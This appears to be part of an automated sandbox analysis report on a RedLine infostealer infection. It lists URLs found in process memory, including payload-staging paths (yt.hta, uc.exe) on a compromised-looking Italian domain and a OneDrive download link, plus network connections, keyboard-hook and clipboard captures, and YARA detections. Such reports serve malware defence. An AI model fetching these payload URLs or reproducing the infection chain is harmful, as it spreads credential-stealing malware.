                    Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1485374798.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                    Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1485374798.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                    Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1485374798.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                    Source: powershell.exe, 00000011.00000002.1634145596.0000029E324B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
                    Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1485374798.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
                    Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1485374798.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
                    Source: svchost.exe, 0000000E.00000002.2531370506.0000021C38E00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                    Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1485374798.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                    Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1485374798.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                    Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1485374798.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                    Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1485374798.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
                    Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1485374798.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
                    Source: svchost.exe, 0000000E.00000003.1320362193.0000021C38C80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                    Source: bwsiuvcU.pif, 00000017.00000002.1680679015.000000003DE3A000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1788431061.0000000025FC9000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2554879629.000000003DD89000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.irmaklarpaslanmaz.com.tr
                    Source: powershell.exe, 0000000F.00000002.1813302246.000002B010082000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1813302246.000002B0101B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1546422130.0000029E2A0E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                    Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1485374798.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                    Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1485374798.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                    Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1485374798.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                    Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1485374798.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                    Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1485374798.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                    Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1485374798.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0C
                    Source: powershell.exe, 00000011.00000002.1450441892.0000029E1A30E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                    Source: bwsiuvcU.pif, 00000017.00000002.1680679015.000000003DE3A000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 00000017.00000002.1683385991.0000000041372000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000017.00000002.1677075916.000000003BE2B000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000017.00000002.1683295114.0000000041300000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1793876103.0000000029440000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000003.1711636457.000000002944F000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1788431061.0000000025FC9000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1794000591.00000000294C3000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2554879629.000000003DD89000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2552799293.000000003BDB8000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2556860764.0000000041253000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2556758276.00000000411C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r3.i.lencr.org/0o
                    Source: bwsiuvcU.pif, 00000017.00000002.1680679015.000000003DE3A000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 00000017.00000002.1683385991.0000000041372000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000017.00000002.1677075916.000000003BE2B000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000017.00000002.1683295114.0000000041300000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1793876103.0000000029440000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000003.1711636457.000000002944F000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1788431061.0000000025FC9000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1794000591.00000000294C3000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2554879629.000000003DD89000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2552799293.000000003BDB8000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2556860764.0000000041253000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2556758276.00000000411C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r3.o.lencr.org0
                    Source: powershell.exe, 0000000F.00000002.1678474741.000002B000001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1450441892.0000029E1A051000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: powershell.exe, 0000000F.00000002.1839645117.000002B07C378000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.o
                    Source: powershell.exe, 00000011.00000002.1450441892.0000029E1A30E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                    Source: uc.exe, uc.exe, 00000013.00000002.1514685918.0000000014B20000.00000004.00000020.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1438376010.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, bwsiuvcU.pif, 00000017.00000000.1494201950.0000000000416000.00000002.00000001.01000000.0000000F.sdmp, bwsiuvcU.pif, 00000019.00000000.1623023662.0000000000416000.00000002.00000001.01000000.0000000F.sdmp, bwsiuvcU.pif, 0000001B.00000000.1707510490.0000000000416000.00000002.00000001.01000000.0000000F.sdmp, bwsiuvcU.pif.19.drString found in binary or memory: http://www.pmail.com
                    Source: bwsiuvcU.pif, 00000017.00000002.1680679015.000000003DE3A000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 00000017.00000002.1683385991.0000000041372000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000017.00000002.1677075916.000000003BE2B000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000017.00000002.1683295114.0000000041300000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1793876103.0000000029440000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000003.1711636457.000000002944F000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1788431061.0000000025FC9000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1794000591.00000000294C3000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2554879629.000000003DD89000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2552799293.000000003BDB8000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2556860764.0000000041253000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2556758276.00000000411C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                    Source: bwsiuvcU.pif, 00000017.00000002.1680679015.000000003DE3A000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 00000017.00000002.1683385991.0000000041372000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000017.00000002.1677075916.000000003BE2B000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000017.00000002.1683295114.0000000041300000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1793876103.0000000029440000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000003.1711636457.000000002944F000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1788431061.0000000025FC9000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1794000591.00000000294C3000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2554879629.000000003DD89000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2552799293.000000003BDB8000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2556860764.0000000041253000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2556758276.00000000411C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                    Source: bwsiuvcU.pif, 00000017.00000002.1680679015.000000003DDE1000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1788431061.0000000025F71000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2554879629.000000003DD31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                    Source: powershell.exe, 0000000F.00000002.1678474741.000002B000001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1450441892.0000029E1A051000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                    Source: powershell.exe, 00000011.00000002.1546422130.0000029E2A0E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                    Source: powershell.exe, 00000011.00000002.1546422130.0000029E2A0E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                    Source: powershell.exe, 00000011.00000002.1546422130.0000029E2A0E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                    Source: svchost.exe, 0000000E.00000003.1320362193.0000021C38CD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
                    Source: svchost.exe, 0000000E.00000003.1320362193.0000021C38C80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
                    Source: powershell.exe, 00000011.00000002.1450441892.0000029E1A30E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                    Source: powershell.exe, 0000000F.00000002.1678474741.000002B0011BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                    Source: uc.exe, 00000013.00000002.1496845420.000000000081B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://live.com/
                    Source: powershell.exe, 0000000F.00000002.1813302246.000002B010082000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1813302246.000002B0101B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1546422130.0000029E2A0E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                    Source: uc.exe, 00000013.00000002.1496845420.00000000007AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com/_
                    Source: uc.exe, 00000013.00000002.1500694013.00000000025ED000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com/downlo
                    Source: uc.exe, 00000013.00000002.1500694013.00000000025D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com/download?resid=849ABDB14CA5CEC3%21220&authkey=
                    Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1485374798.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
                    Source: powershell.exe, 00000011.00000002.1450441892.0000029E1A4D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sessosesso.it
                    Source: powershell.exe, 00000011.00000002.1450441892.0000029E1A4D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sessosesso.it/assets/aw/Book1.xlsx
                    Source: powershell.exe, 00000011.00000002.1450441892.0000029E1A55B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.sessosesso.it
                    Source: mshta.exe, 00000009.00000002.1863478690.0000019AC1727000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852117667.0000019AC1724000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.sessosesso.it/
                    Source: powershell.exe, 00000011.00000002.1450441892.0000029E1A557000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1450441892.0000029E1A55B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.sessosesso.it/assets/aw/Book1.xlsx
                    Source: powershell.exe, 00000011.00000002.1450441892.0000029E1A55B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.sessosesso.it/assets/aw/uc.exep
                    Source: mshta.exe, 00000009.00000002.1865747161.000001A2C9C00000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1853065476.000001A2C46E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.sessosesso.it/assets/aw/yt.hta
                    Source: mshta.exe, 00000009.00000002.1864667684.000001A2C42A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.sessosesso.it/assets/aw/yt.hta...
                    Source: mshta.exe, 00000009.00000003.1852414679.0000019AC1771000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.1863703689.0000019AC1772000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852117667.0000019AC1757000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.sessosesso.it/assets/aw/yt.hta...-
                    Source: mshta.exe, 00000009.00000002.1863133474.0000019AC16A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.sessosesso.it/assets/aw/yt.hta1
                    Source: mshta.exe, 00000009.00000002.1863133474.0000019AC16F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.sessosesso.it/assets/aw/yt.hta5
                    Source: mshta.exe, 00000009.00000002.1863133474.0000019AC16A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.sessosesso.it/assets/aw/yt.hta6288
                    Source: FT. 40FE CNY .xlsx.lnkString found in binary or memory: https://www.sessosesso.it/assets/aw/yt.htaAC:
                    Source: mshta.exe, 00000009.00000002.1863133474.0000019AC1680000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.sessosesso.it/assets/aw/yt.htaC:
                    Source: mshta.exe, 00000009.00000003.1853065476.000001A2C46E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.sessosesso.it/assets/aw/yt.htaDe
                    Source: mshta.exe, 00000009.00000002.1863790955.0000019AC1850000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.sessosesso.it/assets/aw/yt.htaH
                    Source: mshta.exe, 00000009.00000002.1863703689.0000019AC1772000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.sessosesso.it/assets/aw/yt.htaLMEMX
                    Source: mshta.exe, 00000009.00000002.1863884931.0000019AC19B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.sessosesso.it/assets/aw/yt.htaPS_BROW
                    Source: mshta.exe, 00000009.00000002.1863133474.0000019AC16A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.sessosesso.it/assets/aw/yt.htaU
                    Source: mshta.exe, 00000009.00000002.1863133474.0000019AC16A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.sessosesso.it/assets/aw/yt.hta_
                    Source: mshta.exe, 00000009.00000003.1859449128.000001A2C48C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.sessosesso.it/assets/aw/yt.htahttps://www.sessosesso.it/assets/aw/yt.hta
                    Source: mshta.exe, 00000009.00000002.1863133474.0000019AC170A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.sessosesso.it/assets/aw/yt.htaindows
                    Source: uc.exe, 00000013.00000002.1496845420.000000000081B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zyupsq.by.files.1drv.com/
                    Source: uc.exe, 00000013.00000002.1496845420.000000000081B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zyupsq.by.files.1drv.com/y4mZWAAbbWbD2Z_SLbFHXttkWK-AZlqt62tunxr4xpHZuH07d5XHa5kbVXE61GY17Y2
                    Source: uc.exe, 00000013.00000002.1496845420.000000000081B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zyupsq.by.files.1drv.com/y4meSWi_sxRIVEad6REzmio40CREEc5i8wX7nys_a0wT5VjuHcwzIZewYF7haE8C4Cu
                    Source: uc.exe, 00000013.00000002.1496845420.000000000081B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zyupsq.by.files.1drv.com:443/y4mZWAAbbWbD2Z_SLbFHXttkWK-AZlqt62tunxr4xpHZuH07d5XHa5kbVXE61GY
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                    Source: unknownHTTPS traffic detected: 89.46.106.29:443 -> 192.168.2.7:49705 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 89.46.106.29:443 -> 192.168.2.7:49710 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 89.46.106.29:443 -> 192.168.2.7:49712 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 89.46.106.29:443 -> 192.168.2.7:49713 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.7:49716 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Installs a global keyboard hook
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifWindows user hook set: 0 keyboard low level C:\Users\Public\Libraries\bwsiuvcU.pifJump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifWindows user hook set: 0 keyboard low level C:\Users\Public\Libraries\bwsiuvcU.pif
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifWindows user hook set: 0 keyboard low level C:\Users\Public\Libraries\bwsiuvcU.pif
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifWindow created: window name: CLIPBRDWNDCLASS
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifWindow created: window name: CLIPBRDWNDCLASS
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCode function: 23_2_41D67A03 GetKeyState,GetKeyState,GetKeyState,23_2_41D67A03
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCode function: 23_2_41D67A08 GetKeyState,GetKeyState,GetKeyState,23_2_41D67A08

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: amsi64_7800.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                    Source: 23.2.bwsiuvcU.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 25.1.bwsiuvcU.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 25.1.bwsiuvcU.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 23.1.bwsiuvcU.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
